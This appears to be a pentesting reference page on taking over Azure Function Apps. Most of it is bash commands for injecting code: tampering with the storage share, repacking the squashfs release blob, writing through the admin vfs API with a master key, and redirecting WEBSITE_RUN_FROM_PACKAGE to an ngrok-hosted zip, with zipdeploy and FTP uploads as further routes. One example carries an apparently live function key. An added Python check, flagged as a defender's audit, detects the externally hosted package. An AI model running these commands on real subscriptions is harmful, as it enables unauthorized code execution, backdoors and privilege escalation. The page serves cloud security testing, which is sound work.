```bash
# Username is the name of the storage account
# Password is the Storage Account Key
# Open the connection to the file share
open "smb://<STORAGE-ACCOUNT>.file.core.windows.net/<FILE-SHARE-NAME>"
# Change the code of the script like /site/wwwroot/function_app.py
```
function-releases (WEBSITE_RUN_FROM_PACKAGE)
In the folder function-releases of the container in the storage account used by the function app, zip releases are usually found as well.
```bash
# List containers inside the storage account of the function app
az storage container list \
  --account-name <acc-name> \
  --output table

# List files inside one container
az storage blob list \
  --account-name <acc-name> \
  --container-name <container-name> \
  --output table

# Download file
az storage blob download \
  --account-name <acc-name> \
  --container-name scm-releases \
  --name scm-latest-<app-name>.zip \
  --file /tmp/scm-latest-<app-name>.zip

## Even if it looks like the file is a .zip, it's a Squashfs filesystem
# Install
brew install squashfs

# List contents of the filesystem
unsquashfs -l "/tmp/scm-latest-<app-name>.zip"

# Get all the contents
mkdir /tmp/fs
unsquashfs -d /tmp/fs /tmp/scm-latest-<app-name>.zip
```
With enough permissions to connect to the blob container that holds the file with the zip extension (which is actually a squashfs filesystem), it is possible to execute arbitrary code in the Function and escalate privileges.
```bash
# Modify code inside the script in /tmp/fs adding your code
# Generate new filesystem file
mksquashfs /tmp/fs /tmp/scm-latest-<app-name>.zip -b 131072 -noappend

# Upload it to the blob storage
az storage blob upload \
  --account-name <storage-account> \
  --container-name scm-releases \
  --name scm-latest-<app-name>.zip \
  --file /tmp/scm-latest-<app-name>.zip \
  --overwrite
```
```bash
# Get "script_href" from
az rest --method GET \
  --url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/functions?api-version=2024-04-01"

# Access
curl "<script-href>?code=<master-key>"

## Python example:
curl "https://newfuncttest123.azurewebsites.net/admin/vfs/home/site/wwwroot/function_app.py?code=RByfLxj0P-4Y7308dhay6rtuonL36Ohft9GRdzS77xWBAzFu75Ol5g==" -v
```
And to change the code that is being executed in the function:
```bash
# Set the code to set in the function in /tmp/function_app.py
## The following continues using the python example
curl -X PUT "https://newfuncttest123.azurewebsites.net/admin/vfs/home/site/wwwroot/function_app.py?code=RByfLxj0P-4Y7308dhay6rtuonL36Ohft9GRdzS77xWBAzFu75Ol5g==" \
  --data-binary @/tmp/function_app.py \
  -H "Content-Type: application/json" \
  -H "If-Match: *" \
  -v
```
```bash
# Write inside /tmp/web/function_app.py the code of the function
cd /tmp/web
zip function_app.zip function_app.py
python3 -m http.server
# Serve it using ngrok for example
ngrok http 8000
```
Modify the function, keeping its previous parameters, and add at the end the setting WEBSITE_RUN_FROM_PACKAGE pointing to the URL of the zip that contains the code.
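As an added defender's check (not part of the original page), this Python snippet audits a Function App's settings for a WEBSITE_RUN_FROM_PACKAGE value that pulls the package from anywhere other than the app's own storage account, or over plain http, which is exactly what the tunnel-hosted zip described above looks like from the configuration side. The settings dicts, account name and key are constructed placeholders.

```python
from __future__ import annotations
from urllib.parse import urlparse

# Constructed sample settings, shaped like the output of
# `az functionapp config appsettings list` flattened to name -> value.
# The AccountKey below is a placeholder, not a real secret.
SAMPLE_OK = {
    "AzureWebJobsStorage": "DefaultEndpointsProtocol=https;AccountName=funcstore;"
                           "AccountKey=<placeholder-key>;EndpointSuffix=core.windows.net",
    "WEBSITE_RUN_FROM_PACKAGE": "https://funcstore.blob.core.windows.net/function-releases/app.zip",
}
SAMPLE_TAMPERED = {
    "AzureWebJobsStorage": SAMPLE_OK["AzureWebJobsStorage"],
    # package pointed at an externally hosted tunnel URL, as in the technique above
    "WEBSITE_RUN_FROM_PACKAGE": "http://abcd1234.ngrok-free.app/function_app.zip",
}


def storage_account_from_conn_string(conn: str) -> str | None:
    """Return the AccountName from an Azure storage connection string, lower-cased."""
    for part in conn.split(";"):
        key, _, val = part.partition("=")
        if key.strip().lower() == "accountname" and val.strip():
            return val.strip().lower()
    return None


def audit_run_from_package(settings: dict) -> list[str]:
    """Return a list of findings; an empty list means the package source looks expected."""
    findings: list[str] = []
    value = (settings.get("WEBSITE_RUN_FROM_PACKAGE") or "").strip()
    if value in ("", "0", "1"):
        return findings  # unset, or the package lives in the app's own file share
    url = urlparse(value)
    if url.scheme != "https":
        findings.append(f"package fetched over {url.scheme or 'unknown scheme'} instead of https")
    host = (url.hostname or "").lower()
    account = storage_account_from_conn_string(settings.get("AzureWebJobsStorage", ""))
    if account is None:
        findings.append("cannot derive the app's storage account; verify the package host manually")
    elif host != f"{account}.blob.core.windows.net":
        findings.append(f"package host {host!r} is not the app's storage account {account!r}")
    return findings


if __name__ == "__main__":
    for name, cfg in (("ok", SAMPLE_OK), ("tampered", SAMPLE_TAMPERED)):
        print(name, audit_run_from_package(cfg) or "no findings")
```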
```bash
# This is a python example, so we will be overwriting function_app.py
# Store in /tmp/body the raw python code to put in the function
az rest --method PUT \
  --uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/hostruntime/admin/vfs/function_app.py?relativePath=1&api-version=2022-03-01" \
  --headers '{"Content-Type": "application/json", "If-Match": "*"}' \
  --body @/tmp/body
```
```bash
# Get settings values
curl -u '<username>:<password>' \
  https://<app-name>.scm.azurewebsites.net/api/settings -v

# Deploy code to the function
zip function_app.zip function_app.py # Your code in function_app.py
curl -u '<username>:<password>' -X POST --data-binary "@<zip_file_path>" \
  https://<app-name>.scm.azurewebsites.net/api/zipdeploy
```
```bash
# macOS install lftp
brew install lftp

# Connect using lftp
lftp -u '<username>','<password>' \
  ftps://waws-prod-yq1-005dr.ftp.azurewebsites.windows.net/site/wwwroot/

# Some commands
ls # List
get ./function_app.py -o /tmp/ # Download function_app.py in /tmp
put /tmp/function_app.py -o /site/wwwroot/function_app.py # Upload file and deploy it
```
Note that the FTP username is usually in the format <app-name>\$<app-name>.